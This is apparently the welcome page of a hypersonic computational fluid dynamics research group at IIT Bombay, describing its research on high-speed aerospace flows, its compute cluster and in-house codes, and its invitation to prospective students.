Welcome to the hypersonic CFD group at IIT Bombay. We are an interesting collection of graduate and undergraduate students synergistically working together at the frontiers of research. Our primary interest is to study high-speed flows in aerospace applications. Some of us are engaged in theoretical analysis of fundamental flow phenomena, while others develop numerical models of the flow physics. There are other students who apply these computational tools to simulate practical flows. The overall aim is to cover the full spectrum of research – from fundamental physics to real-life applications – and to make a difference in the engineering world.

Much of the computational work is done on a Linux-based high-performance compute cluster set up in our lab. In-house parallel CFD codes are routinely used for three-dimensional simulation of practical geometries like hypersonic inlets for scramjet engines and reentry capsules. Majority of the research is funded by Indian defense and space programmes.

We are looking for talented and motivated students at all levels to participate in ongoing projects, interact with the group members, learn together and share the excitement. Prospective candidates are encouraged to look up the list of research projects and the work done by current students and alumni.
